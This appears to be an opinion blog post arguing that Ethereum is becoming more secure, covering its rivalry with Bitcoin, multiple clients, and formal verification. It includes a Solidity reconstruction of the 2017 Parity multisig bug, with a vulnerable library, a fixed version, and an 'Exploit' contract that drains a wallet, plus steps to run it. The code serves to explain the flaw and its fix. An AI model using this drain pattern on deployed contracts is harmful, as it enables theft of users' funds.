Ethereum: Full Featured Yet Highly Resilient

The Rivalry Between Bitcoin And Ethereum: A Brief History

If you were to casually browse one of the communities dedicated to Bitcoin and ask someone what they think about Ethereum, how it compares to Bitcoin, the potential it represents and the likelihood of it becoming the dominant crypto, you would quickly encounter a prevalent point of criticism, oft repeated like a mantra.

“Ethereum isn’t as secure as Bitcoin.”

Pundits, developers, thought leaders and other notable figures in the Bitcoin sphere have appropriated this narrative and contributed to it becoming ingrained and an integral part of the collective consciousness in the crypto community.

With this article I’m going to argue why I think they’re wrong.


I approached the scene in 2011, and like so many others I was compelled by Satoshi’s vision of a world where people could trade goods and services using a novel peer-to-peer, decentralized and trustless digital form of cash.

Eager to participate in this nascent sector I started mining and frequenting some of the more technically minded communities. I did so in order to get a sense of how this newfangled Blockchain tech based on an arcane mix of cryptography, economics, p2p networking and game theory was revolutionizing the way a digital asset could be issued, secured and transacted.

As the space matured and the first contenders to the Bitcoin throne materialized, I started to notice a worrying trend of stagnation in the Bitcoin ecosystem, with individuals often dismissing every new coin that tried to do something new, risky or unique. Deviating from the established formula that had served Bitcoin so well and made it so successful (PoW, a minimal scripting language, the UTXO model) was branded as heresy, and every attempt was considered destined for failure before the network even went live.

Bitcoin Maximalism – the belief that Bitcoin is the superior platform by virtue of its scarcity, security properties and network effect – coalesced as a school of thought. As more and more zealots started to pick up the banner for this faction, they inevitably contributed to the balkanization of the ecosystem and the rampant tribalism that is now prevalent.

When Vitalik Buterin started researching, designing and proposing the idea that would become Ethereum, many people (especially in the Bitcoin community) thought it was unlikely to work; they posited that even if it did, such a system would be fraught with security vulnerabilities. Some of the criticism levied against Ethereum rests on the assumption that its main feature, a Turing-complete smart-contract language, is also its main downside because of the huge attack surface it represents.


After the creation of the genesis block and the successful deployment of the Ethereum mainnet, things rapidly escalated in a crescendo of fury and accusations. The DAO hack and the subsequent hard fork, widely viewed by the Bitcoin community as a bailout and a violation of the “code is law” tenet, only exacerbated the situation. After the DAO hack, the Ethereum devs took the only possible route (in their eyes) to salvage the viability of the project and, with a coordinated effort, hard forked the network, reverting the effects of the hack by moving the drained Ether to a contract from which the original token holders could withdraw it.

It became apparent that there was an urgent need for a concerted, multi-pronged initiative to shore up attack vectors and increase security.

Ethereum Strikes Back: Formal Verification And Multiple Clients


Ethereum currently has three main clients, Geth (written in Go), Parity (written in Rust) and Harmony (written in Java), with one more on the way, developed as an internal project at ConsenSys by the PegaSys team. As the DoS attacks around Devcon2 demonstrated, having several clients built on independent codebases that implement the same specification and interoperate is a major boon for the security and resilience of the network. If a fatal flaw (a DoS vector, an RCE or some other show-stopping bug, even one that merely crashes nodes rather than being exploitable) is found in one client, the nodes running the other clients keep the network alive, and an attacker needs an independent bug in every implementation to take the whole network down, which raises the cost of an attack significantly.

When an unknown attacker exploited a DoS bug in Geth in the autumn of 2016, the network was severely impaired. Thanks to a healthy mix of nodes running the Parity client, which was less affected by the specific issues being exploited, Ethereum continued to chug along. After the developers shipped optimizations to Geth and the Tangerine Whistle hard fork (EIP-150) repriced the under-priced opcodes the attacker had been abusing, the client stabilized and the network recovered, becoming once again fully usable. Being widely adopted has resulted in a wide array of security incidents, but each one is an invaluable opportunity to test the security of the system in a real-world scenario.

Ethereum, being valuable and widely adopted, is effectively offering a perpetual bug bounty for critical security vulnerabilities, incentivizing bad actors to throw everything they’ve got at it. This is making the network stronger, and I think the metaphor used by Andreas Antonopoulos to describe the adaptive nature of Bitcoin is very apt and applies to Ethereum as well:

“In the meantime, Bitcoin isn’t living in a bubble. Bitcoin is a sewer rat. It’s missing a leg. Its snout was badly mangled in an accident last year. It’s not allergic to anything. In fact, it’s probably got a couple of strains of bubonic plague on it which it treats like a common cold. You have a system that is antifragile and dynamic and robust.”

This is largely accurate, but if Bitcoin is a sewer rat then Ethereum is a whole pack of them, not being beholden to a single entity the way Bitcoin is with the Core team and Blockstream. As time passes, another very important technique in the strategy to strengthen Ethereum’s security is emerging: formal verification.

Formal verification is a procedure in which the desired properties of a piece of code are written down as a precise specification and then mathematically proven to hold for every possible input and execution path, not just for the inputs a test suite happens to exercise. An attacker can no longer steer the code into an unexpected state by crafting inputs, because the proof already covers all of them. Formal verification is not a panacea: a proof is only as strong as the specification it checks, and it says nothing about properties nobody thought to specify, about the compiler, or about the client executing the code. Still, it eliminates whole classes of bugs in applications and clients, and together with regular audits by reputable firms and technically knowledgeable community members, and with bug bounties, it is an important part of the effort to improve Ethereum’s security posture.


Yes, the application layers residing on top of Ethereum are regularly suffering from security vulnerabilities. Is that bad for Ethereum? No.

On the traditional Internet, websites get hacked daily.

Is it the fault of TCP/IP and the underlying OSI model? No.

Has it discouraged adoption of the internet as a communication, computing and commerce medium? No.

Is the security of Ethereum ideal right now? Certainly not, as the Parity hack of July 2017 showed. Parity’s multisig wallets were thin contracts that forwarded any call they did not recognise to a shared library contract via delegatecall, so the library’s code ran against the calling wallet’s storage. The library’s initialisation function, which sets the wallet’s owners, had been left publicly callable with no check that the wallet was already initialised, so anyone could invoke it on a deployed wallet, make themselves the sole owner and drain it. Attackers did exactly that and stole over $30M USD worth of Ether (roughly 150,000 ETH).
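To make that bug concrete, here is an added, deliberately simplified reconstruction of the pattern. It is my illustration, not Parity’s actual wallet code; the contract names, the single-owner `execute` function and the `onlyUninitialized` guard are assumptions for the example. The vulnerable and the fixed library share one storage layout so either can sit under the same wallet; the `Exploit` contract drains a wallet backed by the first and reverts against the second.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative reconstruction, not Parity's code. Each wallet forwards calls here with
// delegatecall, so this code runs against the CALLING wallet's storage. The slot layout
// (owners at slot 0, required at slot 1) must be identical in library and wallet.
abstract contract WalletLibraryBase {
    address[] public owners;  // slot 0
    uint256 public required;  // slot 1

    function initWallet(address[] memory _owners, uint256 _required) public virtual;

    function isOwner(address a) public view returns (bool) {
        for (uint256 i = 0; i < owners.length; i++) {
            if (owners[i] == a) return true;
        }
        return false;
    }

    // Simplified: any single owner can spend. The real wallet collected `required`
    // confirmations, which does not change the initialisation bug.
    function execute(address payable to, uint256 value) public {
        require(isOwner(msg.sender), "not an owner");
        (bool ok, ) = to.call{value: value}("");
        require(ok, "transfer failed");
    }
}

// The July 2017 pattern: initWallet is meant to run once from the wallet constructor,
// but it is public and never checks whether the wallet already has owners.
contract WalletLibraryVulnerable is WalletLibraryBase {
    function initWallet(address[] memory _owners, uint256 _required) public override {
        owners = _owners;
        required = _required;
    }
}

// Hardened library (assumed fix for this example): same layout, second initialisation refused.
contract WalletLibraryFixed is WalletLibraryBase {
    modifier onlyUninitialized() {
        require(owners.length == 0, "wallet already initialised");
        _;
    }

    function initWallet(address[] memory _owners, uint256 _required)
        public
        override
        onlyUninitialized
    {
        require(_owners.length > 0 && _required > 0 && _required <= _owners.length, "bad config");
        owners = _owners;
        required = _required;
    }
}

// Thin wallet: holds the Ether and the owner list, borrows all logic from the library.
contract Wallet {
    address[] public owners;       // slot 0, mirrors the library
    uint256 public required;       // slot 1
    address public immutable lib;  // immutables live in code, not storage, so the layout still matches

    constructor(address _lib, address[] memory _owners, uint256 _required) payable {
        lib = _lib;
        (bool ok, ) = _lib.delegatecall(
            abi.encodeWithSignature("initWallet(address[],uint256)", _owners, _required)
        );
        require(ok, "init failed");
    }

    receive() external payable {}

    // Forwards ANY selector the wallet does not implement itself. With
    // WalletLibraryVulnerable that includes initWallet, so a stranger can
    // re-initialise a deployed wallet and become its only owner.
    fallback() external payable {
        (bool ok, bytes memory ret) = lib.delegatecall(msg.data);
        require(ok, "library call failed");
        assembly { return(add(ret, 32), mload(ret)) }
    }
}

interface IWalletViaLibrary {
    function initWallet(address[] calldata _owners, uint256 _required) external;
    function execute(address payable to, uint256 value) external;
}

// The attack reduced to two calls. Against WalletLibraryVulnerable the wallet's balance
// ends up here; against WalletLibraryFixed the first call reverts.
contract Exploit {
    function drain(address wallet) external {
        address[] memory me = new address[](1);
        me[0] = address(this);
        IWalletViaLibrary(wallet).initWallet(me, 1);  // hits the fallback, rewrites owners
        IWalletViaLibrary(wallet).execute(payable(address(this)), wallet.balance);
    }

    receive() external payable {}
}
```

To try it, deploy either library, deploy `Wallet` pointing at it with some Ether and a legitimate owner list, then call `Exploit.drain(wallet)` from an unrelated account: with the vulnerable library the wallet’s balance moves to the `Exploit` contract, with the fixed one the transaction reverts with “wallet already initialised”. The general lesson is that a fallback which delegatecalls everything exposes every public function of the target, running in the caller’s storage, so any initialiser needs a one-shot guard, and forwarding only an explicit whitelist of selectors is safer still.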

But it’s constantly getting better.

As the ecosystem, tooling and documentation improves and security best practices are adopted we’ll gradually see a decrease in critical security incidents affecting Dapps and Smart Contracts.

Don’t fear the hacks, embrace them, as this will ensure that security is going to improve and Ethereum has a bright future ahead.

 
